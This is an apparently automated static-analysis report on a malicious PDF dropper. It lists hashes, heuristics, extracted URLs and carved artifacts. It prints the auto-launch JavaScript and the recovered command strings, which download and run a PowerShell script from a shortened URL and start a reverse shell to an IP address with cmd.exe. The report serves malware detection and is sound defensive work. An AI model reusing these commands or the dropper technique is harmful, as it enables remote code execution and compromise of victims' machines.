Malicious PDF — malware analysis report

Static analysis result for SHA-256 2f622e52539c346c…

MALICIOUS

PDF

213.9 KB Authoring application: PyPDF2 First seen: 2021-05-22
MD5: 76eae69d12d7a3f43a0d2ff73ace4af8 SHA-1: 80d48757efa017e317543143be34e1f5f82fc4a1 SHA-256: 2f622e52539c346c1c49617081ca793bf9e4e52afa8a00eb67d6adb599966b8c
272 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The PDF contains embedded JavaScript that utilizes the `exportDataObject` and `nLaunch` functions to automatically launch an embedded file named 'page.html'. This file is a Base64-encoded Windows executable payload. The script's intent is to download and execute this second-stage payload upon opening the PDF, indicating a malicious dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 0.7508

Heuristics 10

  • Base64-encoded Windows executable payload in PDF critical PDF_BASE64_PE_PAYLOAD
    PDF text contains a long base64 blob that decodes to a verified Windows PE executable. This catches payloads hidden after EOF, inside comments, or in plain text outside normal PDF streams.
  • Suspicious extracted artifact critical EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • exportDataObject + nLaunch — embedded-file launch-on-open dropper critical PDF_JS_EXPORT_LAUNCH_DROPPER
    PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • External URI low PDF_URI
    PDF contains an external URL action
  • Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js In PDF document text
    • https://gopoissonassets710.moipossongo.ga/static/In PDF document text
    • http://www.ascendercorp.com/In PDF document text
    • http://www.ascendercorp.com/typedesigners.htmlIn PDF document text
    • http://www.monotype.comMonotypeIn PDF document text
    • https://wwwimages2.adobe.com/www.adobe.com/content/dam/acom/en/legal/licenses-terms/pdf/PlatformClients_PC_WWEULA-en_US-20150407_1357.pdfPDF link annotation
    • https://tinyurl.com/y88r9epkIn PDF document text
    • http://typekit.com/eulas/000000000000000000014f51In PDF document text
    • https://fedoraproject.org/wiki/Licensing/LiberationFontLicenseIn PDF document text
    • http://typekit.com/eulas/000000000000000000014f4fIn PDF document text
    • http://www.monotype.com/html/mtname/ms_arial.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlIn PDF document text

Extracted artifacts 9

Files carved from inside the sample during analysis.

FilenameKindSourceSize
page.html pdf-embedded-file PDF EmbeddedFile object 46 at offset 0x1473A 134221 bytes
SHA-256: 6c5a1ab33514ef24d66eb658ab6bc7841cf88f4d9c96328c6c68e318a6a374b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0x9C7 58 bytes
SHA-256: 264b30b19988d0d66012af09cd2442e808d747d3fb6c4de44b81438b9bac75e3
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "page.html", nLaunch: 2 });
javascript_obj0004_001.js pdf-javascript-stream PDF /JS object 4 at offset 0x9C7 56 bytes
SHA-256: 7138f87bffcf0462164747b9bc1008c764542af7db17de522dde7b23c4bae8f7
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "page.html", nLaunch: 2 }
base64_pdf_pe_00014942.exe embedded-pe PDF raw base64 PE payload at offset 0x14942 100235 bytes
SHA-256: fcdf4a59fba2aff45ab3c908fb9c63f5596cb574ee186b5e120aed3feeb5ba8f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=base64_pdf_pe_00014942.exe; kind=embedded-pe Static shellcode analysis recovered URL(s): https://tinyurl.com/y88r9epk Static shellcode analysis recovered command string(s): cmd.exe /c mkdir c:\temp 2> NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= ^[Net.SecurityProtocolType^]::Tls12 > c:\temp\b.ps1 & echo (wget 'https://tinyu, cmd.exe /c powershell -Execut, cmd.exe /c powershell -ExecutionPolicy ByPass -File c:\temp\b.ps1 & START /MIN c:\temp\a.exe 76.65.106.72 443 -e cmd.exe -d & exit
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x9C7 115 bytes
SHA-256: 4585fe1d8b50d37587f6a44a0c0fcedebafab044930973664af49854a3626369
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "page.html", nLaunch: 2 });
this.exportDataObject({ cName: "page.html", nLaunch: 2 }
font_00_sfnt_off00009554.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x9554 8344 bytes
SHA-256: 26f4a541ae01668596e6f0ecab6a4ec5af8e0430c526dd47363b686183eb1a36
font_01_sfnt_off0000ac9d.bin pdf-font-stream PDF embedded font (sfnt) at offset 0xAC9D 21532 bytes
SHA-256: 5091de8b5a8651ee3354927cb3e58ac938a47a05778b1c5b3dcda2384521acca
font_02_sfnt_off0000e5e7.bin pdf-font-stream PDF embedded font (sfnt) at offset 0xE5E7 13036 bytes
SHA-256: 63cf60a9e10bbfe3933cc8f3af44b00485e40612cfca4f232e82d5bbf3cb122d
font_03_sfnt_off000106d5.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x106D5 34336 bytes
SHA-256: 434eb42b71a8798cb4ba10d418932446b08869be155f9587626055d9cb3de354

Open this report in the interactive analyzer, or submit your own file for analysis.